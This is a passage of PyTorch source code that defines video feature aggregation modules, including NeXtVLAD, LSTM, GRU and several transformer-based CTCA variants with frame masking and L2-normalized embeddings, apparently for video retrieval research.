# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(activation, p=2, dim=1)
return embedding # (N, output_dim)
def encode(self, x, num_frames):
N, C, T = x.shape[:3] # (N, C, T)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
if self.normalize_input:
x = F.normalize(x, p=2, dim=1) # across descriptor dim
x = self.conv1(x) # (N, feature_size * expansion, T)
        # per-group attention factors
        attention = torch.sigmoid(self.conv2(x))  # (N, groups, T)
        attention = attention * frame_mask.unsqueeze(1)
        attention = attention.view(N, 1, -1)  # (N, 1, groups * T)
        # compute the per-group, per-cluster soft-assignment
        feature_size = self.feature_size * self.expansion // self.groups
        activation = self.conv3(x)  # (N, num_clusters * groups, T)
        activation = self.bn1(activation)
        # fold the groups into the time axis
        activation = activation.view(N, self.num_clusters, -1)  # (N, num_clusters, groups * T)
        # softmax over clusters
        activation = F.softmax(activation, dim=1)  # (N, num_clusters, groups * T)
        activation = activation * attention  # (N, num_clusters, groups * T)
        activation_sum = torch.sum(activation, dim=-1, keepdim=True)  # (N, num_clusters, 1)
        centervlad = self.centroids * activation_sum  # (N, num_clusters, feature_size)
        x_reshaped = x.view(N, feature_size, -1)  # (N, feature_size, groups * T)
        vlad = torch.bmm(activation, x_reshaped.transpose(1, 2))  # (N, num_clusters, feature_size)
vlad -= centervlad # (N, num_clusters, feature_size)
# intra-normalization (N, num_clusters, feature_size)
vlad = F.normalize(vlad, p=2, dim=2)
return vlad
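# Minimal usage sketch for NeXtVLAD (illustrative only; the shapes and the
# helper name are assumptions, not part of the original training code). The
# module expects (N, C, T) clip features plus a per-clip frame count, and it
# needs a CUDA device because frame_mask is built with .cuda().
def _nextvlad_usage_sketch():
    model = NeXtVLAD(feature_size=1024, num_clusters=64, output_dim=1024).cuda()
    x = torch.randn(2, 1024, 300).cuda()          # (N, C, T) frame features
    num_frames = torch.tensor([120, 300]).cuda()  # valid frames per clip
    emb = model(x, num_frames)                    # (N, output_dim), L2-normalized
    assert emb.shape == (2, 1024)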
class LSTMModule(nn.Module):
def __init__(self, feature_size=1024, output_dim=1024, nhid=1024, nlayers=2, dropout=0.2):
super(LSTMModule, self).__init__()
self.feature_size = feature_size
self.nhid = nhid
self.nlayers = nlayers
self.output_dim = output_dim
self.dropout = dropout
self.LSTM = nn.LSTM(
input_size=self.feature_size,
hidden_size=self.nhid,
num_layers=self.nlayers,
dropout=self.dropout,
            # input & output tensors have batch size as the first dimension, e.g. (batch, time_step, input_size)
batch_first=True,
)
self.bn1 = nn.BatchNorm1d(self.feature_size)
def forward(self, x, num_frames):
x = self.bn1(x)
x = x.transpose(-1, -2)
N, T, C = x.shape[:3] # (N, T, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
self.LSTM.flatten_parameters()
output, (h_n, h_c) = self.LSTM(x, None)
output = output * frame_mask.unsqueeze(-1)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (batch, 1)
output = torch.sum(output, dim=-2) / frame_count
# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
return embedding
def encode(self, x, num_frames):
x = self.bn1(x) # (N, C, T)
x = x.transpose(-1, -2)
N, T, C = x.shape[:3] # (N, T, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
self.LSTM.flatten_parameters()
output, (h_n, h_c) = self.LSTM(x, None)
output = output * frame_mask.unsqueeze(-1)
frame_count = torch.sum(frame_mask, dim=-1) # (N)
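        # NOTE: frame_count.item() only works when the batch holds a single
        # clip; like the other encode() methods in this file, this path is
        # written for N == 1 inference.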
output = torch.narrow(output, 1, 0, int(frame_count.item()))
# L2 normalize IMPORTANT!!!
output = F.normalize(output, p=2, dim=2) # (N, T, C)
return output
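# The masked temporal average used by LSTMModule.forward (and by the GRU and
# transformer heads below) can be read as a standalone helper. This is an
# illustrative sketch under that reading, not a function the original
# pipeline defines.
def _masked_mean(output, frame_mask):
    """output: (N, T, C) features; frame_mask: (N, T) 1/0 validity mask."""
    output = output * frame_mask.unsqueeze(-1)           # zero out padded steps
    frame_count = frame_mask.sum(dim=-1, keepdim=True)   # (N, 1) valid lengths
    return output.sum(dim=-2) / frame_count              # (N, C) masked mean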
class GRUModule(nn.Module):
def __init__(self, feature_size=1024, output_dim=1024, nhid=1024, nlayers=2, dropout=0.2):
super(GRUModule, self).__init__()
self.feature_size = feature_size
self.nhid = nhid
self.nlayers = nlayers
self.output_dim = output_dim
self.dropout = dropout
self.GRU = nn.GRU(
input_size=self.feature_size,
hidden_size=self.nhid,
num_layers=self.nlayers,
dropout=self.dropout,
            # input & output tensors have batch size as the first dimension, e.g. (batch, time_step, input_size)
batch_first=True,
)
self.bn1 = nn.BatchNorm1d(self.feature_size)
def forward(self, x, num_frames):
x = self.bn1(x)
x = x.transpose(-1, -2)
N, T, C = x.shape[:3] # (N, T, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
self.GRU.flatten_parameters()
output, h_n = self.GRU(x, None)
output = output * frame_mask.unsqueeze(-1)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (batch, 1)
output = torch.sum(output, dim=-2) / frame_count
# L2 normalize (N*num_directions, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
return embedding
def encode(self, x, num_frames):
x = self.bn1(x) # (N, C, T)
x = x.transpose(-1, -2)
N, T, C = x.shape[:3] # (N, T, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
self.GRU.flatten_parameters()
        output, h_n = self.GRU(x, None)  # nn.GRU returns (output, h_n) only, unlike nn.LSTM
output = output * frame_mask.unsqueeze(-1)
frame_count = torch.sum(frame_mask, dim=-1) # (N)
output = torch.narrow(output, 1, 0, int(frame_count.item()))
# L2 normalize IMPORTANT!!!
output = F.normalize(output, p=2, dim=2) # (N, T, C)
return output
class FSTA(nn.Module):
def __init__(self, frame_feature_size=1024,segment_feature_size=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(FSTA, self).__init__()
self.frame_feature_size = frame_feature_size
self.segment_feature_size = segment_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
encoder_layers = nn.TransformerEncoderLayer(
d_model=frame_feature_size,
nhead=nhead,
dim_feedforward=2048,
dropout=dropout
)
encoder_layers2 = nn.TransformerEncoderLayer(
d_model=segment_feature_size,
nhead=nhead,
dim_feedforward=2048,
dropout=dropout
)
self.frame_transformer_encoder = nn.TransformerEncoder(
encoder_layers, nlayers)
self.segment_transformer_encoder = nn.TransformerEncoder(
encoder_layers2, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
        x, x2 = torch.split(x, x.shape[2] // 2, dim=2)
T, N, C = x.shape[:3] # (T, N, C)
T2, N2, C2 = x2.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.frame_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size, C)
output = self.frame_transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output = torch.cat((output,x2),2)
output = self.segment_transformer_encoder(
output, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output = output.permute(1, 0, 2) # (N, T, C)
output = output * frame_mask.unsqueeze(-1)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
output = torch.sum(output, dim=-2) / frame_count # (N, C)
# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
    def encode(self, x, num_frames):
        x = x.permute(2, 0, 1)  # (T, N, C) -> e.g., (300, 64, 1024)
        x, x2 = torch.split(x, x.shape[2] // 2, dim=2)
T, N, C = x.shape[:3] # (T, N, C)
T2, N2, C2 = x2.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.frame_feature_size, 'Input should have frame_feature_size {} but got {}.'.format(self.frame_feature_size, C)
assert C2 == self.segment_feature_size, 'Input should have segment_feature_size {} but got {}.'.format(self.segment_feature_size, C2)
output = self.frame_transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output = torch.cat((output, x2), 2)
output = self.segment_transformer_encoder(
output, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output = output.permute(1, 0, 2) # (N, T, C)
output = output * frame_mask.unsqueeze(-1)
frame_count = torch.sum(frame_mask, dim=-1) # (N)
output = torch.narrow(output, 1, 0, int(frame_count.item()))
# L2 normalize IMPORTANT!!!
output = F.normalize(output, p=2, dim=2) # (N, T, C)
if self.mlp is not None:
output = self.mlp(output)
return output
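# FSTA consumes frame-level and segment-level features stacked along the
# channel axis. A shape walkthrough with hypothetical sizes (assuming a
# 2048-channel input so the halves line up with the defaults
# frame_feature_size=1024, segment_feature_size=2048):
#   x: (N, 2048, T) --permute--> (T, N, 2048) --split--> x  (T, N, 1024) frame half
#                                                        x2 (T, N, 1024) segment half
# The frame half runs through frame_transformer_encoder, is concatenated back
# with x2, and the resulting 2048-wide sequence feeds segment_transformer_encoder.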
class CTCA(nn.Module):
def __init__(self, feature_size=1024, feedforward=4096 , max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA, self).__init__()
self.feature_size = feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
encoder_layers = nn.TransformerEncoderLayer(
d_model=feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder = nn.TransformerEncoder(
encoder_layers, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
# print(x.shape)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output = output.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output = output * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output = torch.sum(output, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
def encode(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output = output.permute(1, 0, 2) # (N, T, C)
output = output * frame_mask.unsqueeze(-1)
frame_count = torch.sum(frame_mask, dim=-1) # (N)
output = torch.narrow(output, 1, 0, int(frame_count.item()))
# L2 normalize IMPORTANT!!!
output = F.normalize(output, p=2, dim=2) # (N, T, C)
if self.mlp is not None:
output = self.mlp(output)
return output
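# PyTorch's src_key_padding_mask marks positions to IGNORE with True, which is
# why every encoder call above inverts the 1/0 validity mask. A tiny
# illustration (hypothetical values):
#   frame_mask              = [[1., 1., 0.]]            # last step is padding
#   (1 - frame_mask).bool() == [[False, False, True]]
# The same mask could equivalently be written as frame_mask == 0.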
class CTCA_PLUS(nn.Module):
def __init__(self, feature_size=2048, feedforward=4096, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_PLUS, self).__init__()
self.feature_size = feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
encoder_layers = nn.TransformerEncoderLayer(
d_model=int(feature_size/2),
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder = nn.TransformerEncoder(
encoder_layers, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
# print(x.shape)
        x_f, x_t = x.split(self.feature_size // 2, dim=2)
        x = x_f + x_t  # element-wise sum of the two halves
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output = output.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output = output * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output = torch.sum(output, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_MAX(nn.Module):
def __init__(self, feature_size=2048, feedforward=4096, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_MAX, self).__init__()
self.feature_size = feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
encoder_layers = nn.TransformerEncoderLayer(
d_model=int(feature_size/2),
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder = nn.TransformerEncoder(
encoder_layers, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
# print(x.shape)
x_f, x_t = x.split(int(self.feature_size/2), dim=2)
x = torch.maximum(x_f,x_t)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output = output.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output = output * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output = torch.sum(output, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_FC(nn.Module):
def __init__(self, feature_size=1024, feedforward=4096 , max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_FC, self).__init__()
self.feature_size = feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
self.linear = nn.Linear(feature_size, 1024, bias=False)
self.norm = nn.LayerNorm(1024)
self.activation = nn.ReLU()
encoder_layers = nn.TransformerEncoderLayer(
d_model=feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder = nn.TransformerEncoder(
encoder_layers, nlayers, nn.Sequential(self.linear, self.activation, self.norm))
self.mlp = None
self.reset_parameters()
def reset_parameters(self):
nn.init.normal_(self.linear.weight, std=1 / math.sqrt(1024))
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.feature_size, 'Input should have feature_size {} but got {}.'.format(self.feature_size, C)
# print(x.shape)
output = self.transformer_encoder(
x, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output = output.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output = output * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output = torch.sum(output, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
embedding = F.normalize(output, p=2, dim=1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_LATE(nn.Module):
def __init__(self, frame_feature_size=1024, temporal_feature_size=1024, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_LATE, self).__init__()
self.frame_feature_size = frame_feature_size
self.temporal_feature_size = temporal_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
encoder_layers_f = nn.TransformerEncoderLayer(
d_model = frame_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_f = nn.TransformerEncoder(
encoder_layers_f, nlayers)
encoder_layers_t = nn.TransformerEncoderLayer(
d_model=temporal_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_t = nn.TransformerEncoder(
encoder_layers_t, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size+self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size+self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output_f = output_f.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_f = output_f * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_f = torch.sum(output_f, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_f = F.normalize(output_f, p=2, dim=1)
output_t = output_t.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_t = output_t * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_t = torch.sum(output_t, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_t = F.normalize(output_t, p=2, dim=1)
# breakpoint()
embedding = torch.cat((output_f,output_t),1)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
def encode(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size + self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(
self.frame_feature_size + self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output_f = output_f.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_f = output_f * frame_mask.unsqueeze(-1)
# print(output.shape)
        frame_count = torch.sum(frame_mask, dim=-1)  # (N,)
        # print(frame_count.shape)
        output_f = torch.narrow(output_f, 1, 0, int(frame_count.item()))
        # print(output_f.shape)
        # L2 normalize IMPORTANT!!!
        output_f = F.normalize(output_f, p=2, dim=2)  # (N, T, C)
        output_t = output_t.permute(1, 0, 2)  # (N, T, C)
        # print(output_t.shape)
        output_t = output_t * frame_mask.unsqueeze(-1)
        # print(output_t.shape)
        frame_count = torch.sum(frame_mask, dim=-1)  # (N,)
        # print(frame_count.shape)
        output_t = torch.narrow(output_t, 1, 0, int(frame_count.item()))
        # print(output_t.shape)
        # L2 normalize IMPORTANT!!!
        output_t = F.normalize(output_t, p=2, dim=2)  # (N, T, C)
embedding = torch.cat((output_f, output_t), 2)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_LATE_PLUS(nn.Module):
def __init__(self, frame_feature_size=1024, temporal_feature_size=1024, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_LATE_PLUS, self).__init__()
self.frame_feature_size = frame_feature_size
self.temporal_feature_size = temporal_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
encoder_layers_f = nn.TransformerEncoderLayer(
d_model = frame_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_f = nn.TransformerEncoder(
encoder_layers_f, nlayers)
encoder_layers_t = nn.TransformerEncoderLayer(
d_model=temporal_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_t = nn.TransformerEncoder(
encoder_layers_t, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
# breakpoint()
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size+self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size+self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output_f = output_f.permute(1, 0, 2) # (N, T, C)
# print(output_f.shape)
output_f = output_f * frame_mask.unsqueeze(-1)
# print(output_f.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_f = torch.sum(output_f, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_f = F.normalize(output_f, p=2, dim=1)
output_t = output_t.permute(1, 0, 2) # (N, T, C)
# breakpoint()
# print(output.shape)
output_t = output_t * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_t = torch.sum(output_t, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_t = F.normalize(output_t, p=2, dim=1)
# breakpoint()
embedding = output_f + output_t
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_LATE_MAXIMUM(nn.Module):
def __init__(self, frame_feature_size=1024, temporal_feature_size=1024, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1):
super(CTCA_LATE_MAXIMUM, self).__init__()
self.frame_feature_size = frame_feature_size
self.temporal_feature_size = temporal_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
encoder_layers_f = nn.TransformerEncoderLayer(
d_model = frame_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_f = nn.TransformerEncoder(
encoder_layers_f, nlayers)
encoder_layers_t = nn.TransformerEncoderLayer(
d_model=temporal_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_t = nn.TransformerEncoder(
encoder_layers_t, nlayers)
self.mlp = None
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size+self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size+self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
output_f = self.transformer_encoder_f(x_f, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
output_t = self.transformer_encoder_t(x_t, src_key_padding_mask=(1 - frame_mask).bool()) # (T, N, C)
# print(output.shape)
output_f = output_f.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_f = output_f * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_f = torch.sum(output_f, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_f = F.normalize(output_f, p=2, dim=1)
output_t = output_t.permute(1, 0, 2) # (N, T, C)
# print(output.shape)
output_t = output_t * frame_mask.unsqueeze(-1)
# print(output.shape)
frame_count = torch.sum(frame_mask, dim=-1, keepdim=True) # (N, 1)
# print(frame_count.shape)
output_t = torch.sum(output_t, dim=-2) / frame_count # (N, C)
# print(output.shape)
# L2 normalize (N, output_dim) IMPORTANT!!!
output_t = F.normalize(output_t, p=2, dim=1)
# breakpoint()
embedding = torch.maximum(output_f, output_t)
# breakpoint()
if self.mlp is not None:
embedding = self.mlp(embedding)
return embedding
class CTCA_LATE_NetVLAD(nn.Module):
def __init__(self, frame_feature_size=1024, temporal_feature_size=1024, feedforward=2048, max_seq_len=128, nhead=8, nlayers=1, dropout=0.1,netvlad_clusters=16, netvlad_output_dim=512):
super(CTCA_LATE_NetVLAD, self).__init__()
self.frame_feature_size = frame_feature_size
self.temporal_feature_size = temporal_feature_size
self.max_seq_len = max_seq_len
self.nhead = nhead
self.nhid = nlayers
self.dropout = dropout
self.netvlad_clusters = netvlad_clusters
self.netvlad_output_dim = netvlad_output_dim
self.mlp = None
self.activation = nn.ReLU()
encoder_layers_f = nn.TransformerEncoderLayer(
d_model = frame_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_f = nn.TransformerEncoder(
encoder_layers_f, nlayers, nn.LayerNorm(frame_feature_size))
encoder_layers_t = nn.TransformerEncoderLayer(
d_model=temporal_feature_size,
nhead=nhead,
dim_feedforward=feedforward,
dropout=dropout
)
self.transformer_encoder_t = nn.TransformerEncoder(
encoder_layers_t, nlayers, nn.LayerNorm(temporal_feature_size))
self.netvlad_f = NetVLAD(self.frame_feature_size, self.netvlad_clusters, outdims=self.netvlad_output_dim)
self.netvlad_t = NetVLAD(self.temporal_feature_size, self.netvlad_clusters, outdims=self.netvlad_output_dim)
def forward(self, x, num_frames):
x = x.permute(2, 0, 1) # (T, N, C) -> e.g., (300, 64, 1024)
T, N, C = x.shape[:3] # (T, N, C)
# mask padded frame feature
if len(num_frames.shape) == 1:
num_frames = num_frames.unsqueeze(1)
frame_mask = (
0 < num_frames - torch.arange(0, T).cuda()
).float() # (N, T)
# print(frame_mask.shape)
assert C == self.frame_feature_size+self.temporal_feature_size, 'Input should have feature_size {} but got {}.'.format(self.frame_feature_size+self.temporal_feature_size, C)
# print(x.shape)
x_f, x_t = x.split(self.frame_feature_size, dim=2)
